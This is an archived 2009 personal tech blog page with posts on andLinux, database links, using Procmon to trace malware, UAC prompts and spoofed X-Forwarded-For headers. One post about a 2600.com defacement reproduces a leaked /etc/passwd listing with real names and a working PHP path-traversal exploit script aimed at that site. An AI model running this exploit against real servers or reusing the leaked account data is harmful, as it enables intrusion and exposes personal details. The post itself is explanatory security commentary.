Back to Top

Thursday, April 30, 2009

Toying around with andLinux

0 comments

I don’t remember exactly where I heard about it (although I seem to remember that it was on the Ubuntu UK Podcast). andLinux is a package based on coLinux (Cooperative Linux), which in turn is a port of the Linux kernel to the Windows platform. How does that work? The short (and somewhat inaccurate) description is: the Linux kernel is run as a separate process under Windows, with a special set of drivers that tunnel I/O to a set of simulated devices (for example the hard disk read/writes are tunneled to a file, the network packets are sent to a virtual NIC, etc). What andLinux brings to the table is a set of preconfigured interoperability services (like installing Xming and setting up shortcuts to connect to the VM).

screenshot_krita

Some things I found during the short time I’ve run andLinux:

  • latency is quite bad, especially in the case of GUI applications tunneled trough Xming. This is in a way understandable, since it is just one process, and inside of it there is an other set of “scheduling” (that is, it can’t take advantage of the multi-core systems)
  • the supplied ubuntu version is rather old (7.10), but you can’t really upgrade because the kernel might break on you (see the above explanation about coLinux on why you need a special kernel). However, you can still update the packages, by editing /etc/apt/sources.list and using the name old-releases.ubuntu.com (see this thread on their forum). After the changes you can apt-get update / apt-get upgrade to your hearts content.
  • Surprisingly aptitude is not installed, but this can be resolved quickly by apt-get aptitude
  • to expand the size of the root drive, do the following (I’m assuming that you have cygwin installed)
    1. Stop coLinux
    2. Execute the following command on the main drive: dd if=/dev/null of=base.drv bs=1G seek=8 This will extend it to 8GB. Be aware that you have to use a filesystem which supports files larger than 2G (ie. NTFS) (credit to the OpenWRT wiki for inspiring the command)
    3. Restart coLinux and issue the following command (found it here): resize2fs /dev/cobd0 (found it here)
    4. Done! (BTW, isn't is amazing that you can resize the FS online, without unmounting it first?)

PS. Other ways to run Ubuntu in parallel with Windows are: using Qemu or even using Qemu from a USB stick. And lets not forget the ubercool wubi installer, which makes installing Ubuntu on a Windows machine as easy as any other (Windows) program.

Wednesday, April 29, 2009

Database links

0 comments

1016563557_276d23fdc5_o Via the MySQL performance blog: the Percona 2009 conference posted the slides (most of them anyways). There is some very good and diverse material in there (not necessarily MySQL specific). I also found the following link in one of the presentations: http://omniti.com/does/postgresql – love it!

Testing Disk Speed: the dd Test – I/O is the bottleneck in a well-designed DB, so it is important to know how far you can stretch. Along the same lines of database testing we have Database Test 2, a series of test. There are some interesting benchmarks related to different configuration options with different filesystems. Of course, you should do your own testing, but this is a good starting point.

Finally, there are some issues with iotop, but it still helped be in tracking down the fact that when I upgraded to Ubuntu Jaunty (9.04), the indexer got reactivated and it was stressing the harddrive of my machine.

Picture taken from LindaH's photostream with permission.

Tuesday, April 28, 2009

Using Procmon for finding malware

5 comments

The scenario is: you know you are infected, because you’ve identified a process associate with a malware, but you can’t figure out how that given process is getting launched. A variation of this is: you kill the process, remove the executable but it reappears after a given amount of time / after reboot / etc.

A great tool to help you identify the source of the problems is Process Monitor (or Procmon for short) from Microsoft (formerly Sysinternals). It records all kind of actions related to the registry, filesystem and network with detailed information about the source of the call (process, stacktrace, etc). It can also perform this logging during bootup (which is useful, since malware can launch before you get to the desktop). Here is a short tutorial on how to use it:

The scenario is:

You have malware.bat in you system32 directory with the following content:

@echo off
echo Boo!
pause > NUL

It is being launched by launcher.bat, which is started because of an entry in the registry and has the following contents:

@echo off
call c:\WINDOWS\system32\malware.bat

Pretend that you don’t know this and want to find out how the “malware” gets started. So fire up Procmon and check “Enable Boot Logging”. You can also uncheck “Resolve Network Addresses”, because we are not interested in them currently and it speeds up things a little bit.

procmon_options

Now restart your computer and observe that the “malware” is launched. Now start Procmon again, and it will ask you if (and where) you want to save the capture file from this reboot:

procmon_save_bootfile

After you saved the file, you can search in it and locate references to our “malware”. When you’ve located a reference, you can see the properties of the process when it executed the particular command. In our case it is cmd.exe running the “launcher”:

procmon_file_properties

However, this was the easy part. The hard part is interpreting the results :-). A process can “touch” a file for many reasons. Don’t immediately assume that just because one process is related to the malware, it too is instantly malicious. For example, all programs registered in the “Run” and similar registry key are started by explorer.exe, which isn’t malware ;-). An other reason why a clean process could launch malicious files is because they’ve loaded a DLL related to the malware. Check the stack tab. Conversely, just because the name / icon looks familiar, don’t assume that it’s innocent. Check that it is in the right path (an old trick is to put executable in the system directory with the same names as the ones in system32). If possible, check that the digital certificate is valid (malware can for example modify the code in executables to launch itself – which invalidates the certificates). When in doubt, second check. Sites like VirusTotal can give you a good indicator on the “maliciousness” of the file. Also, you can submit your files to sandboxes like ThreatExpert or CWSandbox, and see how it behaves. This can give you and indication about other files you might need to take a look at.

Good luck and stay secure!

Oracle buys Sun (and gets MySQL)

0 comments

Here is Monty’s (co-founder of MySQL, left SUN some time ago) opinion. On a more light-hearted note, here are some Slashdot comments :-)

Fro rho – a good example for why case sensitivity is important:

> Their string comparisons are case sensitive.

8.4 has citext. Or you can make an index with lower() on the appropriate columns.

IMO it's preferable for software to not assume that "Helped my uncle Jack off a horse." and "Helped my uncle jack off a horse." are the same thing.

And from Just Some Guy we get the security angle on it:

Imagine an OS where strcmp() was case insensitive, and where it was used to compare hashed passwords when authenticating users. Realize that base64 is now really base36, and that you're been throwing away approximately half the bits per character in the encoded password, and that your passwords are now about .5^$LENGTH as secure.

Have fun auditing your MySQL-based webapps to make sure that none of them use base64 password encoding coupled with case-insensitive searches!

The new Solaris licensing terms:

1s - free
0s - $10 per 0, minimum 100,000 0s

per processor core, multiplied by the number of megabytes of RAM installed in your system.

Oh, pardon me, this isn't a production system, but is a development workstation? Allow me to refer you to the above licensing fee schedule. Thank you for choosing Oracle!

The new stock ticker:

Oracle (ORCL) announces that in order to emphasize the importance of this operation, and better reflect its activities, will switch its stock ticker name to JAVA.

:-)

My personal opinion is that this will accelerate people migrating to MySQL forks, like Drizzle, which is good, because it removes much of the old cruft, but migration is painful, if you’ve happen to rely (knowingly or unknowingly) on one of those “features”. But it has to be done (like migrating to Apache 2, PHP 5, etc).

Mixed links

1 comments

We start off with a rebuttal from VMWare to a video posted by Microsoft comparing Hyper-V and VMWare ESX. While I’m no fan of any big company, such misleading marketing attempts should be considered unethical and maybe even illegal, since it contains mischaracterizations of some features like the page sharing between VMs. While in this video we clearly have a “marketing” and a “tech” guy, sometimes the “tech” guys themselves engage in such behavior: on show 52 of RunAs radio (a great, albeit somewhat Microsoft focused, IT podcast BTW) Anil Desai who is described as “an independent consultant based in Austin, TX” says something like: VMWare ESX has a large disk footprint, a couple of hundred of megabytes while Hyper-V is small, it only needs a couple of megs neglecting to mention that in order to run Hyper-V you have to have Windows Server 2008 installed which consumes a couple of Gigs.

The Braidy Tester’s blog has a very nice series entitled “Favorite Bug”. One of the recent ones was caused by a failure to strip the references to debugging symbols and the path of debugging symbols being pointed to the CD drive (on some machines). Ouch! Very obscure, very hard to reproduce and very hard to diagnose. Congratulations for catching it!

From terminal23.net: throw-away mail box sites – useful if you don’t want to receive spam like I do :-). You can get a temporary address also from PlanAHeist (via their blog).

Detecting VMware with JavaScript – the short version: it uses JavaScript to find the MAC addresses of the NIC cards and compares the manufacturer of it (the first three bytes) with the range reserved for VMWare. Of course, if you have this level of privileges from JS, you can do other things (like enumerate processes and look for the VMWare guest additions, etc). Cool idea.

Via the Reverse Engineering Reddit:

  • IDC scripting a Win32.Virut variant - Part 1 – a good intro into IDA scripting.
  • Bit Twiddling Hacks and The Aggregate Magic Algorithms – while they are cute and interesting to look at, never-ever use them in production code! The only exception is if you’ve profiled your code, thought about it for a week and still think that it is a good idea to do it, because understanding, debugging and porting such code can be a nightmare (also remember that “Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.” - Brian W. Kernighan)
  • So You Want To Be a Hacker? - Part I, Part II, Part III and Part IV. It covers it from the point of view of somebody wanting to modify (“mod”) a closed-source game. Very useful to get into the mindset.
  • Locked and Loaded – an error in the Windows XP SP2 exception handler (it would interesting to see exactly which versions of MS Windows exhibit this behavior)

From the fun department: Black Perl - “Black Perl is an infamous piece of Perl poetry”. Staying with the fun side of Perl, we have SuperPython (via perl one-liner). If you don’t get the joke (as I didn’t at first): it takes the number of spaces at every line, treats it like the ASCII code of a character and evaluates the resulting string. Here is how to convert a simple program to SuperPython :-).

From Scott Hanselman: Low Bandwidth View and other Hidden (and Future) Features of MSDN

From taint.org:

  • Message Queue Evaluation Notes – from Second Life. Can be useful if you are looking at different options to implement MQ’s (it mainly looks at FLOSS options, which is good, both from a price and from a “debuggabiality” point of view). There is also a related comment on the Unlimited Novelty blog.
  • Two sites for visualizing sorting algorithms: one more visual (with many cool options for filtering) and one static (but it might better in visually / instinctively comparing two algorithms than the first option)
  • Facebook's photo storage rewrite – very cool. Also, it is quite interesting that they found it necessary to optimize it to this level (ie. dropping filesystem structures entirely). Probably it is just the law of large numbers – the improvement might be relatively small but in absolute terms large.
  • Akamai IP Application Accelerator – sounds like a cool service (routing traffic trough a private network with guaranteed characteristics), however – as the post shows – it’s not all roses and you should do a careful evaluation before using it.
  • Easy AI with Python – at first I thought that he will talk about Orange or something similar, but the talks is at a much more basic level. A lot of fun. Embedded below for simplicity :-)

Via rootshell.be I found this page: Detecting loss of performance in Dynamic Bottleneck Capacity (DBCap) measurements using the Holt-Winters Algorithm. While it is a mouthful, it is basically a method to detect regularities in the data and predict future values based on these regularities (or more precisely: when the actual values don’t match the predicted values). It seems that rrdtool/cacti has some support for this, so you might not need to understand all the math behind for implementation :-) (the picture below is taken from the linked forum post).

cacti_graph 

From the SANS diary: it seems that OAuth has some serious (protocol level!) issues. This is bad, because it means that everyone (including the big boys like Google and Yahoo) who conform to the specification have this issue. Update: in the meantime they’ve released details about the problem. It is a kind of a session fixation attack, but with the OAuth session, not with the actual website session.

From the All about Linux blog: OpenOffice.org Opens up for Business – an article talking about setting up OpenOffice.org in companies. It has some good suggestions. An additional thing you could do is to set the default file format to Microsoft Word.

An interesting behavior of PHP: The Problem With is_callable() And __call()

How to grep for multiple strings: grep "string1\|string2\|string3" file (found it here).

From daniel.haxx.se: bittorrent vs HTTP and FTP vs HTTP – short comparisons between the different protocols. Not very detailed, but a good overview if you don’t know the details of the protocols.

Via the digitalbond blog: How to perform a full 65,535 UDP and TCP port scan with just 784 Packets – ok, the description is a little misleading, the actual mechanism is: it connects to the remote (Windows) machine trough WMI (so it must have a valid login credential) and asks for the list of open ports. Even if we abstract away from these restrictions, it’s still less accurate than a full scan, because local rootkits can subvert the system to hide open ports, which makes me question the accurateness of the phrase “If you have a PCI requirement to perform a full port scan of a target, this credentialed technique can also be used” (then again, rootkits are mostly used to hide outgoing not incoming traffic).

On the Dark Operator blog there is a nice overview of FOCA, a tool to extract metadata from a large amount of different fileformats. This can be very useful for penetration testers for example.

Via the 1raindrop blog: 10 easy steps to writing the scariest cyberwarfare article ever. Very true. I also liked the first comment:

Any insider in any walk of life could write a similar article about how the mainstream media misleads people about their specialty. The lesson is simple. The mainstream media only knows how to write a few types of stories. They will make any subject fit into one of their templates.

The funny part is that, knowing that the media doesn't get their area of expertise right, people still believe what the media writes in areas outside of their specialty. OK, it's not that funny. Still, I have to admire the media for their ability to write the same few stories over and over and keep people reading them.

Via the Secure Home Networks blog: an additional source for domain names to block (from emerging threats). These kinds of blacklists (although they can’t cover 100% of the problems) are very effective these days, when almost all malware tries to communicate with specific set of IPs / domain names.

From the Mu Dynamics Research Labs: Google Code respects the mime type when serving up files directly from the SVN repo. A little known feature of SVN being handy (maybe I can use this repo to host the small amount of files which will be removed from the Google Pages site) Speaking of Google Code, they added support for Mercurial, and provide a nice visualization to understand the relation between the patches.

Matt Cutts managed to boot Ubuntu 9.04 in 7.83 seconds with a SSD. I myself updated to the final release yesterday and it went smoothly. The new theme is simpler and darker than the old one, which should make some people happy. And also note the number of packages it needed to download for the update:

Screenshot-Distribution Upgrade

Leet! :-). Some related notes: you can do a sudo apt-get autoremove followed by sudo apt-get autoclean to free up some space after the update. Also, VirtualBox doesn’t seem to detect that there is a new version (2.2.0) out there, you have to manually go to the site, download the new package, remove the old one and install the new. 9.04 doesn’t include the old, closed-source flgrx driver, but it actually seems to work better with the open source ones. It also includes a “cleanup” tool, but be vary that it marks manually installed packages (like VirtualBox or Opera) as “not needed”.

From Andy Helsby's  Bookmarks:

From LinuxWorld we have: 10 Expert Ubuntu Tricks – there are some nice ones in there which you might or might not have known about. For example 3, 4 and 5 were new to me.

Via the Farfromr00tin blog we have a paper about the ramifications of IE7/IE8 zones [PDF]. The gist of it: if one of your intranet sites gets powned, it is really, really bad. On a related note: Google Chrome just fixed a vulnerability related to the existence of an “undefined” zone, which made the same-origin policy exploitable.

Data escaping madness from Joshua Drake’s blog. These are small details which can bite you in the rear end, so test, test, test religiously. And also, test for failure, to make sure that the proper exception is thrown is something goes south.

Via Roger's Security Blog: Cost of a Lost Laptop – useful is you need to convince people that laptops need additional security.

Free networking tools:

From the carnal0wnage blog: How do YOU defend against 0day?! – the short answer: by diversifying (not using what the mainstream uses). The long answer: a large number (90%+ – I’m pulling this out of my rear-end) of computers are not even patched relative to the known vulnerabilities, so it is very rare that you have to worry about 0days.

From Arbor Networks: Many Days of DDoS for Everyone – as it stands now, there are a whole lot of people out there who can take down a whole lot of websites via DDoS, producing real financial harm for those individuals / companies (although we could debate on a philosophical level if money is real :-)). What are we going to do about it? (sidenote: every time I hear about twitter, I wonder if the people who invested all that money into it understand that 16 year old can take it offline for weeks).

Trooper.ro – a great Romanian metal band, and they’ve put many of their songs online for free. You can start here, with one of their first and maybe best known pieces.

Upcoming PHP 5.3 features and beyond – also includes a presentation of some of the PHP 6 features, mainly focused internationalization and localization (two hard problems).

Monday, April 27, 2009

Social engineering for malware – a bright future

0 comments

Some time ago I wrote a post in which I pondered the deficiencies of the “executable file” definition and the implications for whitelisting products. The problem is that “data” files can also result in actions being taken (and we don’t even need arbitrary code execution type of vulnerabilities for that). The particular example given the post is the one of installer (MSI) files, however here is an other one: VBScripts.

cscript.exe is included in all recent version of Windows by default, so using a simple VBScript which I found via this article we can produce the following elevation prompt:

elevate_vbs

Observe how any detail which could help us identify the actual script is utterly missing, and also how everything seems to indicate the trustworthiness of the application (after all, it is a “verified” Microsoft program). You can do the same thing with JScript or PowerShell, which is included by default in Windows 7 (yes, I’m running it in a VM, and yes, it is annoying as hell!). Something like Symantec’s UAC extension might help you, since it has the ability to show the command line, but the fraction of people to take a look at it and be able to make a judgment call is very, very small.

In conclusion: UAC made most of the existing malware obsolete, but it is just a question of (little) time until we will see malware adapted to Windows Vista / Windows 7. UAC will improve the code quality somewhat (unfortunately most programmers will think of it the “how to avoid triggering UAC and work around its quirks” way, rather than “how to ensure that our application only uses a minimal set of privileges”), but in the long run it won’t solve the malware problem (or even make a considerable dent in it), just like other technologies won’t. To Microsoft’s credit, they said this, but I’m not sure that all people got the message (and there is also the fact that in many places, Microsoft or not, UAC is listed as something which will make you “more secure”). The remaining role of the UAC will be that IT people can say to their users: “it is your fault! you have been asked if you want to rung the program!”.

PS. And getting by the kernel-mode restrictions is as easy as installing a new root certificate, which is trivial if you have administrative privileges... This means that it will be business as usual, for rootkit writers also.

Update: After poking around with the Symanted UAC tool, it seems that it too is susceptible to a similar attack, and it is maybe worse (because it displays more "green checkboxes" indicating that the command you are about to run is safe).

Sunday, April 26, 2009

Interesting method for website blocking

0 comments

462273752_990a45728d_o Quick note: I was listening to the latest episode of Watchguard’s Radio Free Security podcast (no relation with them, other than a listener to the podcast) and they discussed an interesting technique for filtering websites (I’m no fan of traffic filtering, but the technique seemed interesting):

Usually SSL requests are either blocked by the target IP or by the target hostname, because the filtering proxy doesn’t have the ability to look into the actual content. An other frequently used approach is for the proxy to decrypt and the re-encrypt the traffic, however this requires a certificate to be installed on every users computer, otherwise they will get an “Invalid certificate” error on every SSL website they visit. What the Watchguard appliance can do is to look at the certificate of the website (which is transmitted in the clear at the beginning of the session negotiation) and block based on the name present in the certificate. Nifty!

Picture taken from kpwerker's photostream with permission.

Friday, April 17, 2009

Interesting videos

1 comments

It seems that the Internet is helping more and more to find the equilibrium point between the needs of “big media” and “independent media”. In this post I would like to mention two sources of useful / interesting videos:

The first would be the videos from the TED (Technology, Entertainment, Design) conference (credit goes to Kees Leune for bringing it to my attention). From Wikipedia:

TED (Technology, Entertainment, Design) is an annual conference that defines its mission as "ideas worth spreading". The lectures, also called TED Talks, cover a broad set of topics including science, arts and design, politics, education, culture, business, global issues, technology and development, and entertainment. Speakers have included such people as former U.S. President Bill Clinton, Nobel laureates James D. Watson, Murray Gell-Mann, and Al Gore, Microsoft co-founder Bill Gates, Google co-founders Sergey Brin and Larry Page, and Billy Graham.

The videos of the talk can be found on their website (which, somewhat surprisingly, uses PHP :-)). The good: the talks are short (between 5 and 30 minutes) and the speakers are very enthusiastic. Also, the videos are clearly licensed under a well-known license (the CC by-nc-nd 3.0 license) and you can embed them on your websites (for example below I’ve embedded a very interesting talk about the psychology of cheating). The player is also quite advanced (for example it can do seeking without waiting for the entire movie to load). The bad: they don’t have a playlist feature, so it is a little harder for you to mark the videos which you would like to watch. You can however open them in a background tab, because the player doesn’t load until you actually look at the page. An other word of warning: the volume control resets itself between views. Also, some of the talks are a little “out there”, but – as always – use your judgment.

An other source for science / tech news are the Google Tech Talks. Again, a lot of material (with some of them in HD quality) and you can find a lot of interesting content:

The conclusion: there are a lot of good videos out there which you can watch entirely legally and which should make “big media” realize that how inflated their pricing scheme is.

Thursday, April 16, 2009

Weird Sybase JDBC driver issue (jConnect)

0 comments

I post this so that the search engines can pick up on it and maybe it can help somebody out. I had the following issue with the Sybase JDBC driver (jConnect):

I was calling a stored procedure and it was throwing an error. However these errors weren’t propagated to the Java code in form of SQLExceptions, as I was expecting. Things which solved the problem:

None of the solutions are ideal and some are actually counter-intuitive (why should it make a difference if I use .executeUpdate instead of .execute? – the later should be a more generic version of the former). I’m by no means a JDBC expert, so I posted it on stackoverflow.

PS. This is an other reason for using open-source: with it you can at least step trough the code without using tools like JadEclipse (which is a very nice tool btw for decompiling your classes directly from your IDE without any fuss).

Be an (imaginary) hero

0 comments

I got the link from splitbrain.org, however I was hesitant to post the image, since the site didn’t display any information about the conditions of using it:

MyHero

Make your own at www.cpbherofactory.com

However I finally got a response from the cpbgroup (the creators of the Hero Factory), in which they state that I can use the image on my personal website as long as I include a link back to them. Not the response I was hoping for, but at least they have got back to me. It is very important to license your work and think ahead of time how you would and wouldn’t like your work being used (an other shortcoming of the reply was that it applies specifically to me and my blog. While I assume that they would license it to everyone under the same conditions, it would have been nice if they stated this in their response).

Monday, April 13, 2009

User input, by any other name

0 comments

2494693462_b5bdd4af54_o A friend of mine posed me an interesting question: how is it possible that a CMS software, which displayed the IP addresses for comments made anonymously (instead of the username) showed a private IP (like 172.16.63.15)? Before I get to the actual explanation, here are some specific clarifications which should be made:

  • IP addresses are not a 100% reliable unique identifier. Well known methods of circumventing such restrictions are dynamic IP addresses and proxy servers. A less well-known method is BGP hijacking for example. These couldn’t have been the method used however, because almost any router (hopefully) would have dropped the packets containing private addresses.
  • Make sure that the IP addresses are actually private. The actual private IP ranges are the following (as defined by section 3 of RFC 1918):
    • 10.0.0.0 - 10.255.255.255
    • 172.16.0.0. - 172.31.255.255
    • 192.168.0.0 - 192.168.255.255
    It is easy for someone not working daily with these ranges to mistake an IP close to these ranges as private, like 196.168.1.2. An other source of confusion can come from the less intuitive range for the B class (for example the address 172.15.80.1 is public and routable)

Now for the actual cause: my first (and, as it turns out, correct) intuition was that the software was trying to be too clever for its own good and was parsing the “X-Forwarded-For” header. This header can be added by proxies to indicate the original source of the request, but – as other user input – can be relatively easily spoofed by the client. For example below is a small Perl script, which uses HTTP::Proxy and adds an arbitrary X-Forwarded-For header to your requests (you can find the most up-to-date version of the script in my SVN repository):


#!/usr/bin/perl
use strict;
use warnings;
use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;
use Data::Dumper;

my $proxy = HTTP::Proxy->new;
$proxy->x_forwarded_for(0);
$proxy->port(3128);
$proxy->push_filter(
 mime    => undef,
 request => HTTP::Proxy::HeaderFilter::simple->new(
  sub { $_[1]->header('X-Forwarded-For' => '10.1.2.3') },
    ),
);
$proxy->start;

There are a couple of issues here:

  • PHP mixes values of different “trust levels” in the same structure. In fact the, the actual code from the project looked like this: if (!array_key_exists('ip', $this->arrCache)) { $this->arrCache['ip'] = strlen($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; }. As you can see, both REMOTE_ADDR and X_FORWARDED_FOR were obtained from the same array, even though REMOTE_ADDR is much more trust-worthy (not counting issues like route-hijacking)
  • The next logical question would be: what sanitization is done on this value? I didn’t dig more deeply in the code, but judging from the code-fragment, not very much. In fact, if I recall correctly, this header can contain multiple IP addresses if the request passed trough multiple proxies, a case which doesn’t seem to be handled by this code. It can contain IPv6 addresses. It also can contain characters which can cause problems if the value is used in a certain way (think SQL injection or command injection)

The conclusion is that you must take great care in determining which input parameter can be controlled by whom and under what condition and make your judgment call on filtering and escaping depending on that. When in doubt, filter. It is better to loose a couple of milliseconds in performance than ending up with a p0wned infrastructure.

Update: An other possible dangerous situation can be when a reverse proxy is in front of one or more webservers. With this setup the developer can easily get the impression that the X-Forwarded-For header is controlled by our proxy, so it is safe to use the values from it without filtering, right? Wrong! A quick look at two widely used solutions (Apache and Squid) show that both can be configured to concatenate the user supplied value with the IP address. In fact, this is the default behaviour for mod_proxy.

Speaking of p0wned infrastructure, apparently 2600.com was defaced for a short period of time in the weekend and contained the following piece of output (archived for posterity):


Go Hack Tetris!

o_O

O_o

^_O

www.gosu.pl/tetris/


http://www.2600.com/cuba/index.khtml?postetc/passwd

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
ftp:*:21:21:Anonymous FTP:/u/ftp:/sbin/nologin
sshd:*:22:65533:sshd unprivileged processes:/:/sbin/nologin
postfix:*:25:25:Postfix Mail System:/nonexistent:/nonexistent
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
apache:*:80:80:Apache:/nonexistent:/sbin/nologin
apache2:*:8080:80:Apache:/nonexistent:/sbin/nologin
webstats:*:81:83:Web Statistics:/nonexistent:/sbin/nologin
thttpd:*:82:82:thttpd web server:/nonexistent:/sbin/nologin
htproxy:*:85:85:http proxy server:/nonexistent:/sbin/nologin
audit:*:87:87:system audit processes:/nonexistent:/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/sbin/nologin
namazu:*:89:89:Namazu Database:/var/db/namazu:/sbin/nologin
apache2:*:90:90:World Wide Web Owner:/nonexistent:/sbin/nologin
ash:*:1000:1000:ash:/home/ash:/bin/tcsh
emmanuel:*:1001:20:emmanuel:/home/emmanuel:/bin/tcsh
mec:*:1002:1002:mec:/home/mec:/sbin/nologin
omar:*:1003:1003:omar:/home/omar:/sbin/nologin
marko:*:1004:1004:marko:/home/marko:/sbin/nologin
kerry:*:1005:1005:kerry:/home/kerry:/bin/tcsh
juintz:*:1006:1006:juintz:/home/juintz:/bin/tcsh
css:*:1007:1007:carl shapiro:/home/css:/bin/tcsh
kpx:*:1008:1008:kpx:/home/kpx:/sbin/nologin
lgonze:*:1009:1009:lgonze:/home/lgonze:/sbin/nologin
mlc:*:1010:1010:mlc:/home/mlc:/bin/tcsh
ashcroft:*:1011:1011:ashcroft:/home/ashcroft:/usr/local/bin/noshell
ortbot:*:2001:2001:www.ortinstitute.org automated processes:/nonexistent:/sbin/nologin
lexnex:*:2002:2002:lexnex:/home/lexnex:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
sephail:*:1012:1012:Joseph Battaglia:/home/sephail:/sbin/nologin
redhackt:*:1013:1013:Red Hackt:/home/redhackt:/bin/tcsh
thedave:*:1014:1014:Dave Buchwald:/home/thedave:/bin/tcsh
phiber:*:1015:1015:Phiber:/home/phiber:/bin/tcsh
mark:*:1016:1016:Mark:/home/mark:/usr/local/bin/bash

<?php

// current path: $webroot = "/u/www/www.2600.com";

$file = '../../../etc/passwd';
// file can also be a directory name (must end with a slash) - gives directory structure, file_get_contents bug??
// its a little obfuscated with some random chars, but readable

// ------

$save = 'sources/';

$url = 'http://www.2600.com/cuba/index.khtml?post=';
$post = './/../../'.$file;

$overflow = 993;

while (strlen($post) < $overflow) {
    $post = str_replace('.//', './//', $post);
}

$url = $url . $post;

$cont = curl_cont($url);

preg_match('#<div id=\'blog\'>\s*<strong>[^<>]+</strong>\s*<br>([\s\S]+)</div>\s*<div class=\'clears\'>\s*</div>#Ui', $cont, $match);
$cont = $match[1];
$cont = preg_replace('#(\r\n|\n|\r)<br>(\r\n|\n|\r)(\r\n|\n|\r)<br>(\r\n|\n|\r)#', "\r\n\r\n", $cont);
$cont = preg_replace('#<br>(\r\n|\n|\r)#', "\r\n", $cont);
$cont = trim($cont);

if (!$cont) {
    echo 'failed';
    exit;
}

highlight_string($cont);

if (!function_exists('fput')) {
    function fput($f, $s)
    {
        $fp = fopen($f, 'w');
        fwrite($fp, $s);
        fclose($fp);
    }
}

$file = str_replace('http://www.2600.com/cuba/index.khtml?post=', '', $url);
$file = str_replace('../', '', $file);
$file = str_replace('./', '', $file);
$file = preg_replace('#/{2,}#', '', $file);
$file = str_replace('/', '-', $file);

if (!$file) {
    $file = '__index';
}
if ($file) {
    $file = $save.$file;
    if (!file_exists($file)) {
        @fput($file, $cont);
    }
}

function curl_cont($url, $options = array())
{
    $page = curl_get($url, $options);
    if (200 == $page['http_code']) {
        return $page['cont'];
    }
    return null;
}
function curl_get($url, $options = array())
{
    $url = str_replace(' ', '%20', $url);
    $ch = curl_init($url);

    curl_setopt($ch, CURLOPT_HEADER, isset($options['include_header']) ? $options['include_header'] : 0);
    if (substr($url, 0, strlen('https')) == 'https') {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    }
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    if (isset($options['userpwd'])) {
        curl_setopt($ch, CURLOPT_USERPWD, $options['userpwd']);
    }
    if (isset($options['timeout'])) {
        $timeout = ceil($options['timeout']);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    }
    if (isset($options['max_size'])) {
        $range = "0-{$options['max_size']}";
        curl_setopt($ch, CURLOPT_RANGE, $range);
    }
    if (isset($options['referer'])) {
        curl_setopt($ch, CURLOPT_REFERER, $options['referer']);
    }
    // example agent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'
    if (isset($options['agent'])) {
        curl_setopt($ch, CURLOPT_USERAGENT, $options['agent']);
    }
    if (isset($options['headers'])) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $options['headers']);
    }
    if (isset($options['cookie']) && count($options['cookie'])) {
        $cookie = '';
        foreach ($options['cookie'] as $name => $value) {
            $cookie .= sprintf('%s=%s; ', $name, urlencode($value));
        }
        $cookie = trim($cookie);
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    }

    $cont = curl_exec($ch);
    $error = curl_error($ch);
    if ($error) {
        trigger_error('curl_exec() failed: '.$error, E_USER_ERROR);
    }
    $inf = curl_getinfo($ch);
    $inf['cont'] = $cont;
    curl_close($ch);

    return $inf;
}

?> 

Picture taken from Simon Strandgaard's photostream with permission.

Friday, April 10, 2009

Hackish method to include custom content into CruiseControl

0 comments

94986649_3e22dce4b4_b Disclaimer: I’m a CruiseControl newbie, so there might well be a much better / simpler / cleaner method to achieve this. However this is the way I managed to get it working.

  1. Write your (Perl) script and make it output something like this:
    
    <testsuite tests="0" name="summary" failures="0"><system-out>
    foo bar
    </system-out></testsuite>
  2. Make your script run during the build. This can be done directly using exec or in an ant subtask using the exec task. One thing to keep in mind is that CC stops at the first failure – this can be important if you want to run your script even during failures (because it collects statistics about the failures for example)
  3. Check that the output is present in the XML resulting from the XML log.
  4. Hack the XSL such that the contents are displayed in the result HTML email for example:
    
    <table align="center" cellpadding="2" cellspacing="0" border="0" class="header" width="98%"><tr><td>
      <pre><xsl:value-of select="/cruisecontrol/testsuite[@name='summary']/system-out" /></pre>
    </td></tr></table>
    

That’s it folks! Hope that somebody finds it useful.

Picture taken chippenziedeutch's photostream with permission.

Blogs I’m reading

0 comments

51816944_8f5b72193b_oI decided to add a blogroll to my sidebar, however a complete list would have been waaaay to long. Also, I didn’t like the idea of exporting the OPML from Google Reader and massaging it into an HTML format, because it would have meant an other thing which needed periodic updates.

The solution was to take my “shared items” feed from Google Reader, massage it a bit using Yahoo Pipes and create an other feed which includes the distinct blogs that had postings in the feed and include the resulting RSS feed in the sidebar. Unfortunately Blogger renders the feed gadget asynchronously via javascript, which means that I won’t give link goodies to the blogs, even though I would like to :-(.

If you wish to use the pipe yourself, it can be found here. All you need is to plug your RSS feed into it and you get back an RSS feed containing the (distinc) blogs and links to them. Given that I continuously update my shared list with things I read, the list too will get updated frequently.

Picture taken from oddsock's photostream with permission.

Wednesday, April 08, 2009

Mixed links

0 comments

